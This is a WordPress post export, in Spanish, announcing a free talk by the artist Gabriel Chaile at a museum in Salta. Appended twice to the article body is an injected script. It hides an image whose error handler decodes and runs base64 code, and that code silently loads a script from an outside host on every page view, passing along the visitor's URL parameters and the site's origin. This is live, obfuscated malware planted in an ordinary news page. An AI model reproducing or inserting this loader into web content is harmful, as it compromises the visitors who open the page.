{"id":1303,"date":"2022-08-15T13:38:25","date_gmt":"2022-08-15T16:38:25","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1303"},"modified":"2025-08-14T00:38:30","modified_gmt":"2025-08-14T03:38:30","slug":"el-reconocido-artista-tucumano-gabriel-chaile-brindara-una-charla-gratuita-en-el-museo-de-antropologia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1303","title":{"rendered":"El reconocido artista tucumano Gabriel Chaile brindar\u00e1 una charla gratuita en el Museo de Antropolog\u00eda"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#c70b3a\">La charla denominada \u00abEstoy re vos\u00bb, se realizar\u00e1 el jueves 18 a las 19 horas. Este artista aborda las historias de las formas de los objetos.<\/h3>\n\n\n\n<p>El jueves 18 de agosto, a las 19 hs, se realizar\u00e1 \u201cEstoy re vos\u201d. Se trata de una charla con el artista Gabriel Chaile, reconocido internacionalmente por sus obras escult\u00f3ricas que trabaja a partir de \u201cla genealog\u00eda de la forma\u201d.<\/p>\n\n\n\n<p>Chaile desarrolla este concepto de \u201cla genealog\u00eda de la forma\u201d a partir de sus investigaciones formales de la cer\u00e1mica precolonial de lo que hoy es el noroeste argentino.<\/p>\n\n\n\n<p>Su trabajo aborda las historias de las formas de los objetos, buscando entender el proceso por el que las superficies de las cosas adoptan una determinada forma con el tiempo, y que contin\u00faan mutando bajo una l\u00ednea geneal\u00f3gica. Su trabajo reafirma la presencia ancestral que el colonialismo intent\u00f3 borrar.<\/p>\n\n\n\n<p>Gabriel busca que el pensamiento se transforme en materia, que encuentre una forma, una forma que da soluci\u00f3n a necesidades y deseos. Dice: \u201cse modifica la superficie de las cosas, porque el sentido ya no es el mismo al ponerse en crisis la relaci\u00f3n entre forma y contenido. Podr\u00edamos preguntarnos cu\u00e1ntas vidas tiene un objeto o pensar en el acto de volver a tomar un objeto, aprehenderlo\u201d.<\/p>\n\n\n\n<p><strong>M\u00e1s sobre Gabriel Chaile<\/strong><\/p>\n\n\n\n<p>Gabriel desarrolla sus investigaciones antropol\u00f3gicas y visuales a partir de dos conceptos clave: \u201cla ingenier\u00eda de la necesidad\u201d que consiste en, desde el arte, crear objetos y estructuras que colaboren en mejorar las condiciones de una situaci\u00f3n l\u00edmite determinada; y \u201cla genealog\u00eda de la forma\u201d, que implica asumir que, cada objeto, en su repetici\u00f3n hist\u00f3rica, trae consigo un pasado que contar, que se recupera y se actualiza en relaci\u00f3n a un nuevo contexto.<\/p>\n\n\n\n<p>\u201cEs entender la historia de las formas y sus transformaciones en el tiempo. Ese concepto lo desarroll\u00e9 en base a la construcci\u00f3n de la imagen de \u2018negro villero\u2019, \u2018cabecita negra\u2019 o \u2018negro cabeza\u2019. Vuelvo a las cer\u00e1micas ind\u00edgenas porque entiendo que el devenir de esas poblaciones en realidad no murieron sino que terminaron ocupando los lugares que ocupan ahora en las villas, y siendo el personal dom\u00e9stico de la aristocracia porte\u00f1a. Entonces, cuando veo esas cer\u00e1micas en los museos pienso en las situaciones de lucha y resistencia\u201d.<\/p>\n\n\n\n<p>Chaile habla de su identidad y de su origen. Recuerda a su padre alba\u00f1il y a su mam\u00e1 que trabajaba como personal dom\u00e9stico. Refiere tambi\u00e9n a la matanza y la represi\u00f3n a los indios Quilmes: \u201cFueron los que m\u00e1s resistieron y se estima que muchos terminaron teniendo esos trabajos. Eso es lo que me mueve a investigar y profundizar sobre estos temas\u201d. Est\u00e1 interesado en c\u00f3mo es la pobreza contempor\u00e1nea, en los m\u00e1rgenes y los excluidos.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-reconocido-artista-tucumano-gabriel-chaile-brindara-una-charla-gratuita-en-el-museo-de-antropologia-84260\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n\n\n\n<p><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La charla denominada \u00abEstoy re vos\u00bb, se realizar\u00e1 el jueves 18 a las 19 horas. Este artista aborda las historias de las formas de los objetos. El jueves 18 de agosto, a las 19 hs, se realizar\u00e1 \u201cEstoy re vos\u201d. Se trata de una charla con el artista Gabriel Chaile, reconocido internacionalmente por sus obras [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1304,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,9],"tags":[],"class_list":{"0":"post-1303","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1303"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1303"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1303\/revisions"}],"predecessor-version":[{"id":7394,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1303\/revisions\/7394"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1304"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1303"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1303"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1303"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}